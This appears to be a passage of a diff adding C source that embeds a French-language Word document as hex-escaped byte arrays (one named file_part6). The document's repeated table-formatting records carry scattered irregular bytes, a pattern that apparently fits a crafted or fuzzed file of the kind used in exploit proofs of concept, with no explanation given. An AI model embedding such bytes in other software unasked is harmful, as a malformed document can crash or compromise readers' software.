+"\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02"
+"\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04"
+"\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06"
+"\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23"
+"\x76\x02\x03\xdc\x08\x23\x76\x03\x1a\x5d\x06\x23\x76\x04\x05\x4f"
+"\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13"
+"\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00"
+"\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02"
+"\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04"
+"\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00"
+"\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00"
+"\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00"
+"\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6"
+"\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6"
+"\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6"
+"\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02"
+"\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76"
+"\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96"
+"\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35"
+"\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35"
+"\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35"
+"\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34"
+"\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46"
+"\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01"
+"\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53"
+"\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc"
+"\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f"
+"\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x33\x76\x00\x01\x53\x03\x23"
+"\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d"
+"\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b"
+"\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03"
+"\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03"
+"\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03"
+"\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03"
+"\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01"
+"\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00"
+"\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00"
+"\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02"
+"\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04"
+"\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01"
+"\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76"
+"\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06"
+"\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04"
+"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04"
+"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04"
+"\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00"
+"\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05"
+"\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05"
+"\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05"
+"\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6"
+"\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49"
+"\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35"
+"\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35"
+"\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35"
+"\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23"
+"\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc"
+"\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05"
+"\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00"
+"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00"
+"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00"
+"\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6"
+"\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03"
+"\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08"
+"\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07"
+"\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00"
+"\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17"
+"\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06"
+"\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03"
+"\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03"
+"\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03"
+"\x5d\x06\x23\x76\x00\xca\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76"
+"\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07"
+"\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6"
+"\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00"
+"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00"
+"\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00"
+"\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01"
+"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03"
+"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05"
+"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01"
+"\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16"
+"\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21"
+"\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05"
+"\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05"
+"\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05"
+"\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2"
+"\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04"
+"\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46"
+"\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff"
+"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff"
+"\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff"
+"\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6"
+"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6"
+"\x05\x02\x03\xce\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6"
+"\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6"
+"\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00"
+"\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00\x00\x01\x96"
+"\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01\x03\x53\x03"
+"\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08"
+"\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07"
+"\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53\x03\x23\x76"
+"\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03\x04\x5d\x06"
+"\x23\x76\x04\x05\x4f\x07\x6b\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00"
+"\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01\x00\x00\x00"
+"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00"
+"\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00"
+"\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18\xf6\x03\x00"
+"\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2"
+"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d"
+"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d"
+"\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06\x00\x01\x0a"
+"\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66\x01\x00\x00"
+"\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6\x05\x00\x01"
+"\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03"
+"\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05"
+"\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76\x00\x01\x53"
+"\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08\x23\x76\x03"
+"\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06\x5d\x06\x3a"
+"\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01"
+"\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01\x00\x00\x18"
+"\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01"
+"\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03"
+"\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05"
+"\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00\x34\xd6\x06"
+"\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24\x01\x49\x66"
+"\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68\x01\x35\xd6"
+"\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6"
+"\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6"
+"\xf6\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x23\x76"
+"\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02\x03\xdc\x08"
+"\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23\x76\x05\x06"
+"\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00"
+"\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00\x14\xf6\x01"
+"\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03\x53\x03\x35"
+"\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35"
+"\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35"
+"\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05\x00\x00\x00"
+"\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\xf1\x00\x16\x24\x01\x17\x24"
+"\x01\x49\x66\x01\x00\x00\x00\x01\x96\x00\x00\x21\x76\x00\x06\x68"
+"\x01\x35\xd6\x05\x00\x01\x03\x53\x03\x35\xd6\x05\x01\x02\x03\xc2"
+"\x05\x35\xd6\x05\x02\x03\x03\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d"
+"\x06\x35\xd6\x05\x04\x05\x03\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d"
+"\x06\x23\x76\x00\x01\x53\x03\x23\x76\x01\x02\xc2\x05\x23\x76\x02"
+"\x03\xdc\x08\x23\x76\x03\x04\x5d\x06\x23\x76\x04\x05\x4f\x07\x23"
+"\x76\x05\x06\x5d\x06\x3a\x56\x0b\x00\x02\x96\x46\x00\x13\xd6\x30"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x00\x00\x00\xff\x04\x01\x00\x00\x00\x00\x00\xff\x04\x01\x00\x00"
+"\x14\xf6\x01\x00\x00\x18\xf6\x03\x00\x00\x35\xd6\x05\x00\x01\x03"
+"\x53\x03\x35\xd6\x05\x01\x02\x03\xc2\x05\x35\xd6\x05\x02\x03\x03"
+"\xdc\x08\x35\xd6\x05\x03\x04\x03\x5d\x06\x35\xd6\x05\x04\x05\x03"
+"\x4f\x07\x35\xd6\x05\x05\x06\x03\x5d\x06\x34\xd6\x06\x00\x01\x05"
+"\x00\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x46\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd3\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x43\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x14\x00\x18\x00\x12\x00\x01\x00\x9c\x00\x0f\x00\x03\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x38\x00\x00\x40\xf1\xff\x02\x00\x38\x00"
+"\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x4e\x00\x6f\x00"
+"\x72\x00\x6d\x00\x61\x00\x6c\x00\x00\x00\x02\x00\x00\x00\x10\x00"
+"\x5f\x48\x01\x04\x6d\x48\x0c\x04\x73\x48\x0c\x04\x74\x48\x0c\x04"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x3a\x00\x41\x40\xf2\xff\xa1\x00\x3a\x00\x0c\x01\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x11\x00\x50\x00\x6f\x00\x6c\x00\x69\x00"
+"\x63\x00\x65\x00\x20\x00\x70\x00\x61\x00\x72\x00\x20\x00\x64\x00"
+"\xe9\x00\x66\x00\x61\x00\x75\x00\x74\x00\x00\x00\x00\x00\x5a\x00"
+"\x69\x40\xf3\xff\xb3\x00\x5a\x00\x0c\x01\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x0e\x00\x54\x00\x61\x00\x62\x00\x6c\x00\x65\x00\x61\x00"
+"\x75\x00\x20\x00\x4e\x00\x6f\x00\x72\x00\x6d\x00\x61\x00\x6c\x00"
+"\x00\x00\x20\x00\x3a\x56\x0b\x00\x17\xf6\x03\x00\x00\x34\xd6\x06"
+"\x00\x01\x05\x03\x00\x00\x34\xd6\x06\x00\x01\x0a\x03\x6c\x00\x61"
+"\xf6\x03\x00\x00\x02\x00\x0b\x00\x00\x00\x32\x00\x6b\x00\xf4\xff"
+"\xc1\x00\x32\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0c\x00"
+"\x41\x00\x75\x00\x63\x00\x75\x00\x6e\x00\x65\x00\x20\x00\x6c\x00"
+"\x69\x00\x73\x00\x74\x00\x65\x00\x00\x00\x02\x00\x0c\x00\x00\x00"
+"\x00\x00\x2e\x00\xfe\x4f\x01\x00\xf2\x00\x2e\x00\x0c\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x09\x00\x44\x00\x66\x00\x78\x00\x4e\x00"
+"\x75\x00\x6d\x00\x46\x00\x61\x00\x78\x00\x00\x00\x02\x00\x0f\x00"
+"\x00\x00\x2c\x00\xfe\x4f\x01\x00\x02\x01\x2c\x00\x0c\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x08\x00\x44\x00\x66\x00\x78\x00\x48\x00"
+"\x65\x00\x75\x00\x72\x00\x65\x00\x00\x00\x02\x00\x10\x00\x00\x00"
+"\x2a\x00\xfe\x4f\x01\x00\x12\x01\x2a\x00\x0c\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x07\x00\x44\x00\x66\x00\x78\x00\x44\x00\x61\x00"
+"\x74\x00\x65\x00\x00\x00\x02\x00\x11\x00\x00\x00\x3a\x00\xfe\x4f"
+"\x01\x00\x22\x01\x3a\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x0f\x00\x44\x00\x66\x00\x78\x00\x44\x00\x65\x00\x73\x00\x74\x00"
+"\x69\x00\x6e\x00\x61\x00\x74\x00\x61\x00\x69\x00\x72\x00\x65\x00"
+"\x00\x00\x02\x00\x12\x00\x00\x00\x30\x00\xfe\x4f\x01\x00\x32\x01"
+;
+char file_part6[]=
+"\x30\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x44\x00"
+"\x66\x00\x78\x00\x53\x00\x6f\x00\x63\x00\x69\x00\xe9\x00\x74\x00"
+"\xe9\x00\x00\x00\x02\x00\x13\x00\x00\x00\x2c\x00\xfe\x4f\x01\x00"
+"\x42\x01\x2c\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00"
+"\x44\x00\x66\x00\x78\x00\x4f\x00\x62\x00\x6a\x00\x65\x00\x74\x00"
+"\x00\x00\x02\x00\x14\x00\x00\x00\x36\x00\x1f\x40\x01\x00\x52\x01"
+"\x36\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x07\x00\x45\x00"
+"\x6e\x00\x2d\x00\x74\x00\xea\x00\x74\x00\x65\x00\x00\x00\x0d\x00"
+"\x15\x00\x0d\xc6\x08\x00\x02\xb8\x11\x70\x23\x01\x02\x00\x00\x00"
+"\x40\x00\x20\x40\x01\x00\x62\x01\x40\x00\x0c\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x0c\x00\x50\x00\x69\x00\x65\x00\x64\x00\x20\x00"
+"\x64\x00\x65\x00\x20\x00\x70\x00\x61\x00\x67\x00\x65\x00\x00\x00"
+"\x0d\x00\x16\x00\x0d\xc6\x08\x00\x02\xb8\x11\x70\x23\x01\x02\x00"
+"\x00\x00\x34\x00\x29\x40\xa2\x00\x71\x01\x34\x00\x0c\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x0e\x00\x4e\x00\x75\x00\x6d\x00\xe9\x00"
+"\x72\x00\x6f\x00\x20\x00\x64\x00\x65\x00\x20\x00\x70\x00\x61\x00"
+"\x67\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x74\x00\x00"
+"\x07\x00\x00\x02\x01\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00"
+"\x2d\x00\x00\x00\x6e\x00\x00\x00\x81\x00\x00\x00\xab\x02\x00\x00"
+"\xf4\x02\x00\x00\xf5\x02\x00\x00\x11\x03\x00\x00\x32\x03\x00\x00"
+"\x33\x03\x00\x00\x66\x03\x00\x00\x20\x04\x00\x00\xd3\x04\x00\x00"
+"\x08\x05\x00\x00\x62\x05\x00\x00\x63\x05\x00\x00\x8a\x05\x00\x00"
+"\x18\x06\x00\x00\xbc\x06\x00\x00\xbd\x06\x00\x00\xf6\x06\x00\x00"
+"\x97\x08\x00\x00\x98\x08\x00\x00\xb5\x08\x00\x00\x39\x0a\x00\x00"
+"\x3a\x0a\x00\x00\x46\x0a\x00\x00\xbd\x0a\x00\x00\xff\x0a\x00\x00"
+"\xcd\x0c\x00\x00\xe9\x0e\x00\x00\x99\x0f\x00\x00\xb8\x11\x00\x00"
+"\x12\x12\x00\x00\x2f\x13\x00\x00\x7e\x13\x00\x00\x7f\x13\x00\x00"
+"\x91\x13\x00\x00\x10\x14\x00\x00\x11\x14\x00\x00\x15\x14\x00\x00"
+"\x5d\x15\x00\x00\x5e\x15\x00\x00\x68\x15\x00\x00\x20\x16\x00\x00"
+"\x01\x17\x00\x00\x62\x17\x00\x00\x5e\x18\x00\x00\x5f\x18\x00\x00"
+"\xa1\x18\x00\x00\x4e\x19\x00\x00\x71\x1b\x00\x00\xd9\x1b\x00\x00"
+"\x63\x1c\x00\x00\x0d\x1e\x00\x00\x3b\x1e\x00\x00\x0d\x20\x00\x00"
+"\xde\x20\x00\x00\x57\x21\x00\x00\xbc\x21\x00\x00\x7b\x22\x00\x00"
+"\x40\x23\x00\x00\xdf\x23\x00\x00\x69\x23\x00\x00\x87\x23\x00\x00"
+"\x88\x23\x00\x00\x9c\x23\x00\x00\x13\x24\x00\x00\x41\x24\x00\x00"
+"\x42\x24\x00\x00\x5a\x24\x00\x00\x20\x25\x00\x00\x65\x25\x00\x00"
+"\x82\x25\x00\x00\x30\x26\x00\x00\x54\x26\x00\x00\x15\x27\x00\x00"
+"\x60\x27\x00\x00\xf0\x27\x00\x00\x90\x28\x00\x00\x47\x29\x00\x00"
+"\x48\x29\x00\x00\x33\x2a\x00\x00\x34\x2a\x00\x00\x30\x2b\x00\x00"
+"\x23\x2c\x00\x00\x24\x2c\x00\x00\xae\x2c\x00\x00\xc8\x2c\x00\x00"
+"\xc9\x2c\x00\x00\x33\x2d\x00\x00\x34\x2d\x00\x00\xee\x2e\x00\x00"
+"\x4f\x30\x00\x00\x9c\x30\x00\x00\xe3\x30\x00\x00\x62\x31\x00\x00"
+"\x63\x31\x00\x00\x29\x32\x00\x00\xda\x33\x00\x00\xdb\x33\x00\x00"
+"\xe7\x33\x00\x00\x76\x34\x00\x00\x77\x34\x00\x00\x86\x34\x00\x00"
+"\x97\x35\x00\x00\x19\x36\x00\x00\xca\x36\x00\x00\xe4\x37\x00\x00"
+"\x06\x38\x00\x00\x07\x38\x00\x00\x08\x38\x00\x00\x09\x38\x00\x00"
+"\x0a\x38\x00\x00\x19\x38\x00\x00\x1a\x38\x00\x00\x2a\x39\x00\x00"
+"\x6b\x39\x00\x00\x6c\x39\x00\x00\x74\x39\x00\x00\x75\x39\x00\x00"
+"\x81\x39\x00\x00\xe5\x39\x00\x00\xe6\x39\x00\x00\xf0\x39\x00\x00"
